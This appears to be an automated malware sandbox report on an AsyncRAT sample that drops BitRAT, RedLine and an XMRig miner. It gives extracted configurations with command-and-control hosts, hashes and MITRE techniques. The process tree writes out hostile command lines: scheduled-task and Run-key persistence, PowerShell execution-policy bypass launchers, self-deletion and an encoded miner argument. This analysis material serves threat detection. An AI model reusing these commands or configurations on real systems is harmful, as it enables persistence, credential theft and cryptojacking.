asyncrat | 3184a8183ddd00795ae4da31244c3bdf010ab97addc4df2b66129982c9ede4e4

Analysis

max time kernel
300s
max time network
305s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
09-11-2022 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GoogleDriver.exe
Size

63KB
MD5

dae21c538a7a4f8294d7e19916be9100
SHA1

cea1c44030c6f45243a9408e59f8e43304402438
SHA256

3184a8183ddd00795ae4da31244c3bdf010ab97addc4df2b66129982c9ede4e4
SHA512

8e9dd2b4e4ec9b28cb7c40e41f6ba8607e1c16351398d5de84965ee0a596fe255b8bfafb61eee99c83281d7cb43b029695ce68db3b7c942acfe392d63f7d4e26
SSDEEP

1536:6hQDnx1Ak32YGbHZCyYaN1bbLwtY3L3VG/tpqKmY7:6hQDnx1Ak32HHZCyP1bbLxL322z

Score

10^/10

asyncrat bitrat redline xmrig cheat new discovery infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

asyncrat

Version

1.0.7 - modded by last

Botnet

New

nicehash.at:4343

Mutex

adsasutex_qwqdanchun

Attributes

delay
1
install
true
install_file
GoogleDriver.exe
install_folder
%AppData%

aes.plain

Extracted

Family

bitrat

Version

1.38

nicehash.at:6000

Attributes

communication_password
005f16f264f006578c55237781f36898
install_dir
JavaHelper
install_file
Java.exe
tor_process
tor

Extracted

Family

redline

Botnet

cheat

nicehash.at:1338

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\rdln.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\rdln.exe	family_redline
behavioral1/memory/892-94-0x0000000000DD0000-0x0000000000DEE000-memory.dmp	family_redline
behavioral1/memory/1780-97-0x00000000002D0000-0x00000000002DA000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs

Processes:

mina.exeupdater.execonhost.exe

description	pid	process	target process
PID 1748 created 1360	1748	mina.exe	Explorer.EXE
PID 1748 created 1360	1748	mina.exe	Explorer.EXE
PID 1748 created 1360	1748	mina.exe	Explorer.EXE
PID 1184 created 1360	1184	updater.exe	Explorer.EXE
PID 1184 created 1360	1184	updater.exe	Explorer.EXE
PID 2012 created 1360	2012	conhost.exe	Explorer.EXE
PID 1184 created 1360	1184	updater.exe	Explorer.EXE
PID 1184 created 1360	1184	updater.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/784-54-0x00000000010E0000-0x00000000010F6000-memory.dmp	asyncrat
C:\Users\Admin\AppData\Roaming\GoogleDriver.exe	asyncrat
C:\Users\Admin\AppData\Roaming\GoogleDriver.exe	asyncrat
behavioral1/memory/1116-63-0x0000000000A10000-0x0000000000A26000-memory.dmp	asyncrat
behavioral1/memory/1116-64-0x0000000000560000-0x0000000000580000-memory.dmp	asyncrat

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1732-139-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1732-141-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

GoogleDriver.exebit.exerdln.exemina.exeupdater.exe

pid process

1116 GoogleDriver.exe
1780 bit.exe
892 rdln.exe
1748 mina.exe
1184 updater.exe

pid	process
1116	GoogleDriver.exe
1780	bit.exe
892	rdln.exe
1748	mina.exe
1184	updater.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\bit.exe	upx
C:\Users\Admin\AppData\Local\Temp\bit.exe	upx
behavioral1/memory/1780-76-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/1780-95-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/1732-139-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1732-141-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 2 IoCs

Processes:

rdln.exetaskeng.exe

pid process

892 rdln.exe
660 taskeng.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
892	rdln.exe
660	taskeng.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

bit.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java = "C:\\Users\\Admin\\AppData\\Local\\JavaHelper\\Java.exe"	bit.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

bit.exe

pid process

1780 bit.exe
1780 bit.exe
1780 bit.exe
1780 bit.exe
1780 bit.exe

pid	process
1780	bit.exe
1780	bit.exe
1780	bit.exe
1780	bit.exe
1780	bit.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1184 set thread context of 2012	1184	updater.exe	conhost.exe
PID 1184 set thread context of 1732	1184	updater.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1524 schtasks.exe
1076 schtasks.exe
916 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1356 timeout.exe

pid	process
1524	schtasks.exe
1076	schtasks.exe
916	schtasks.exe

pid	process
1356	timeout.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

GoogleDriver.exeGoogleDriver.exepowershell.exepowershell.exerdln.exemina.exepowershell.exepowershell.exeupdater.exepowershell.execonhost.exe

pid	process
784	GoogleDriver.exe
1116	GoogleDriver.exe
1952	powershell.exe
1952	powershell.exe
1952	powershell.exe
432	powershell.exe
1116	GoogleDriver.exe
432	powershell.exe
432	powershell.exe
892	rdln.exe
892	rdln.exe
1748	mina.exe
1748	mina.exe
1500	powershell.exe
1748	mina.exe
1748	mina.exe
1748	mina.exe
1748	mina.exe
2004	powershell.exe
1184	updater.exe
1184	updater.exe
1048	powershell.exe
1184	updater.exe
1184	updater.exe
2012	conhost.exe
2012	conhost.exe
1184	updater.exe
1184	updater.exe
1184	updater.exe
1184	updater.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 52 IoCs

Processes:

GoogleDriver.exeGoogleDriver.exepowershell.exebit.exepowershell.exerdln.exepowershell.exepowershell.exepowershell.exeWMIC.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	784	GoogleDriver.exe
Token: SeDebugPrivilege	1116	GoogleDriver.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeDebugPrivilege	1780	bit.exe
Token: SeShutdownPrivilege	1780	bit.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	892	rdln.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeIncreaseQuotaPrivilege	432	WMIC.exe
Token: SeSecurityPrivilege	432	WMIC.exe
Token: SeTakeOwnershipPrivilege	432	WMIC.exe
Token: SeLoadDriverPrivilege	432	WMIC.exe
Token: SeSystemProfilePrivilege	432	WMIC.exe
Token: SeSystemtimePrivilege	432	WMIC.exe
Token: SeProfSingleProcessPrivilege	432	WMIC.exe
Token: SeIncBasePriorityPrivilege	432	WMIC.exe
Token: SeCreatePagefilePrivilege	432	WMIC.exe
Token: SeBackupPrivilege	432	WMIC.exe
Token: SeRestorePrivilege	432	WMIC.exe
Token: SeShutdownPrivilege	432	WMIC.exe
Token: SeDebugPrivilege	432	WMIC.exe
Token: SeSystemEnvironmentPrivilege	432	WMIC.exe
Token: SeRemoteShutdownPrivilege	432	WMIC.exe
Token: SeUndockPrivilege	432	WMIC.exe
Token: SeManageVolumePrivilege	432	WMIC.exe
Token: 33	432	WMIC.exe
Token: 34	432	WMIC.exe
Token: 35	432	WMIC.exe
Token: SeIncreaseQuotaPrivilege	432	WMIC.exe
Token: SeSecurityPrivilege	432	WMIC.exe
Token: SeTakeOwnershipPrivilege	432	WMIC.exe
Token: SeLoadDriverPrivilege	432	WMIC.exe
Token: SeSystemProfilePrivilege	432	WMIC.exe
Token: SeSystemtimePrivilege	432	WMIC.exe
Token: SeProfSingleProcessPrivilege	432	WMIC.exe
Token: SeIncBasePriorityPrivilege	432	WMIC.exe
Token: SeCreatePagefilePrivilege	432	WMIC.exe
Token: SeBackupPrivilege	432	WMIC.exe
Token: SeRestorePrivilege	432	WMIC.exe
Token: SeShutdownPrivilege	432	WMIC.exe
Token: SeDebugPrivilege	432	WMIC.exe
Token: SeSystemEnvironmentPrivilege	432	WMIC.exe
Token: SeRemoteShutdownPrivilege	432	WMIC.exe
Token: SeUndockPrivilege	432	WMIC.exe
Token: SeManageVolumePrivilege	432	WMIC.exe
Token: 33	432	WMIC.exe
Token: 34	432	WMIC.exe
Token: 35	432	WMIC.exe
Token: SeLockMemoryPrivilege	1732	conhost.exe
Token: SeLockMemoryPrivilege	1732	conhost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

conhost.exe

pid	process
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

conhost.exe

pid	process
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe
1732	conhost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

bit.exe

pid process

1780 bit.exe
1780 bit.exe

pid	process
1780	bit.exe
1780	bit.exe

Suspicious use of WriteProcessMemory 59 IoCs

Processes:

GoogleDriver.execmd.execmd.exeGoogleDriver.execmd.exepowershell.execmd.exepowershell.exerdln.exepowershell.execmd.exepowershell.exetaskeng.exepowershell.exeupdater.execmd.exe

description	pid	process	target process
PID 784 wrote to memory of 900	784	GoogleDriver.exe	cmd.exe
PID 784 wrote to memory of 900	784	GoogleDriver.exe	cmd.exe
PID 784 wrote to memory of 900	784	GoogleDriver.exe	cmd.exe
PID 900 wrote to memory of 1524	900	cmd.exe	schtasks.exe
PID 900 wrote to memory of 1524	900	cmd.exe	schtasks.exe
PID 900 wrote to memory of 1524	900	cmd.exe	schtasks.exe
PID 784 wrote to memory of 1732	784	GoogleDriver.exe	cmd.exe
PID 784 wrote to memory of 1732	784	GoogleDriver.exe	cmd.exe
PID 784 wrote to memory of 1732	784	GoogleDriver.exe	cmd.exe
PID 1732 wrote to memory of 1356	1732	cmd.exe	timeout.exe
PID 1732 wrote to memory of 1356	1732	cmd.exe	timeout.exe
PID 1732 wrote to memory of 1356	1732	cmd.exe	timeout.exe
PID 1732 wrote to memory of 1116	1732	cmd.exe	GoogleDriver.exe
PID 1732 wrote to memory of 1116	1732	cmd.exe	GoogleDriver.exe
PID 1732 wrote to memory of 1116	1732	cmd.exe	GoogleDriver.exe
PID 1116 wrote to memory of 2036	1116	GoogleDriver.exe	cmd.exe
PID 1116 wrote to memory of 2036	1116	GoogleDriver.exe	cmd.exe
PID 1116 wrote to memory of 2036	1116	GoogleDriver.exe	cmd.exe
PID 2036 wrote to memory of 1952	2036	cmd.exe	powershell.exe
PID 2036 wrote to memory of 1952	2036	cmd.exe	powershell.exe
PID 2036 wrote to memory of 1952	2036	cmd.exe	powershell.exe
PID 1952 wrote to memory of 1780	1952	powershell.exe	bit.exe
PID 1952 wrote to memory of 1780	1952	powershell.exe	bit.exe
PID 1952 wrote to memory of 1780	1952	powershell.exe	bit.exe
PID 1952 wrote to memory of 1780	1952	powershell.exe	bit.exe
PID 1116 wrote to memory of 1644	1116	GoogleDriver.exe	cmd.exe
PID 1116 wrote to memory of 1644	1116	GoogleDriver.exe	cmd.exe
PID 1116 wrote to memory of 1644	1116	GoogleDriver.exe	cmd.exe
PID 1644 wrote to memory of 432	1644	cmd.exe	powershell.exe
PID 1644 wrote to memory of 432	1644	cmd.exe	powershell.exe
PID 1644 wrote to memory of 432	1644	cmd.exe	powershell.exe
PID 432 wrote to memory of 892	432	powershell.exe	rdln.exe
PID 432 wrote to memory of 892	432	powershell.exe	rdln.exe
PID 432 wrote to memory of 892	432	powershell.exe	rdln.exe
PID 432 wrote to memory of 892	432	powershell.exe	rdln.exe
PID 892 wrote to memory of 1748	892	rdln.exe	mina.exe
PID 892 wrote to memory of 1748	892	rdln.exe	mina.exe
PID 892 wrote to memory of 1748	892	rdln.exe	mina.exe
PID 892 wrote to memory of 1748	892	rdln.exe	mina.exe
PID 1500 wrote to memory of 1076	1500	powershell.exe	schtasks.exe
PID 1500 wrote to memory of 1076	1500	powershell.exe	schtasks.exe
PID 1500 wrote to memory of 1076	1500	powershell.exe	schtasks.exe
PID 1572 wrote to memory of 1540	1572	cmd.exe	choice.exe
PID 1572 wrote to memory of 1540	1572	cmd.exe	choice.exe
PID 1572 wrote to memory of 1540	1572	cmd.exe	choice.exe
PID 2004 wrote to memory of 1492	2004	powershell.exe	schtasks.exe
PID 2004 wrote to memory of 1492	2004	powershell.exe	schtasks.exe
PID 2004 wrote to memory of 1492	2004	powershell.exe	schtasks.exe
PID 660 wrote to memory of 1184	660	taskeng.exe	updater.exe
PID 660 wrote to memory of 1184	660	taskeng.exe	updater.exe
PID 660 wrote to memory of 1184	660	taskeng.exe	updater.exe
PID 1048 wrote to memory of 916	1048	powershell.exe	schtasks.exe
PID 1048 wrote to memory of 916	1048	powershell.exe	schtasks.exe
PID 1048 wrote to memory of 916	1048	powershell.exe	schtasks.exe
PID 1184 wrote to memory of 2012	1184	updater.exe	conhost.exe
PID 1328 wrote to memory of 432	1328	cmd.exe	WMIC.exe
PID 1328 wrote to memory of 432	1328	cmd.exe	WMIC.exe
PID 1328 wrote to memory of 432	1328	cmd.exe	WMIC.exe
PID 1184 wrote to memory of 1732	1184	updater.exe	conhost.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1360

C:\Users\Admin\AppData\Local\Temp\GoogleDriver.exe
"C:\Users\Admin\AppData\Local\Temp\GoogleDriver.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleDriver" /tr '"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:900

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleDriver" /tr '"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"'
4⤵
- Creates scheduled task(s)
PID:1524

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp9510.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:1356

C:\Users\Admin\AppData\Roaming\GoogleDriver.exe
"C:\Users\Admin\AppData\Roaming\GoogleDriver.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\bit.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\bit.exe"'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952

C:\Users\Admin\AppData\Local\Temp\bit.exe
"C:\Users\Admin\AppData\Local\Temp\bit.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rdln.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rdln.exe"'
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432

C:\Users\Admin\AppData\Local\Temp\rdln.exe
"C:\Users\Admin\AppData\Local\Temp\rdln.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:892

C:\Users\Admin\AppData\Local\Temp\mina.exe
"C:\Users\Admin\AppData\Local\Temp\mina.exe"
8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbmct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
3⤵
- Creates scheduled task(s)
PID:1076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#pabzpsih#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1492

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\mina.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbmct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
3⤵
- Creates scheduled task(s)
PID:916

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe edycnlwzugcaw
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2012

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
PID:592

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe uuhuzuzzdeatgvvd 6E3sjfZq2rJQaxvLPmXgsFbIFjbxmk9QBL7MU6NBupSQ/yPb49Ni8CWmHiG+BmFOZlQDiFNUDfkmEWc2woFGLRtqlxZaMJqfYVCHASAmDi4WqDx2BN1SWbf1FzX3l0BO5odAt9xZ8ywS1nNJVreZJQbhXAWcCXGR2lY/kjxaiE1MX2s7iWnTBwp8KIXfg7HDcPuznp1Elm0jyGorgknzRusTYuproFIGUWn2iFRCj4FEecMuZozROLfx1UuYPLnyjZ2ngHwcFq84HGbPGEsn6L0hkAW1RXnmqvrhxROpX915Fh05CVAxtNj7E4dJWh4xLltr7YWVBP/WuI8oBeZcMdU2HfidYrEtMA+iYLM7jO+2iEMvS8aT18wo0pp/zDaySbsDkF1Sp9QAEiymHjwAbQ==
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1732

C:\Windows\system32\taskeng.exe
taskeng.exe {C87FBD82-6FDB-4023-8A96-E0F15632E50A} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:660

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1184

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bit.exe
Filesize
1.4MB

MD5
32d4216d4ef2af912921fc2931c0bd88

SHA1
3e79dd260b67ed27134246e9461d8878c7ac73e3

SHA256
d1ecf0f3592c06329182cbcd25fa654bb48c441c0b54bfb5c4b40fbaa517cdbf

SHA512
7a25bcf3954238ab946ce95dc4153518fe67e773845f2bd037eac64c93906223b3ec611a04160cc20f85c4afa0b7124c8eacb43667ecb3fdde2776698f5b2b37

Download Submit
C:\Users\Admin\AppData\Local\Temp\bit.exe
Filesize
1.4MB

MD5
32d4216d4ef2af912921fc2931c0bd88

SHA1
3e79dd260b67ed27134246e9461d8878c7ac73e3

SHA256
d1ecf0f3592c06329182cbcd25fa654bb48c441c0b54bfb5c4b40fbaa517cdbf

SHA512
7a25bcf3954238ab946ce95dc4153518fe67e773845f2bd037eac64c93906223b3ec611a04160cc20f85c4afa0b7124c8eacb43667ecb3fdde2776698f5b2b37

Download Submit
C:\Users\Admin\AppData\Local\Temp\mina.exe
Filesize
3.5MB

MD5
bd3bd541461eb9e8b3510441ee459746

SHA1
2ea26afe0901163b0eb7b9c84f46866f3ffd91f7

SHA256
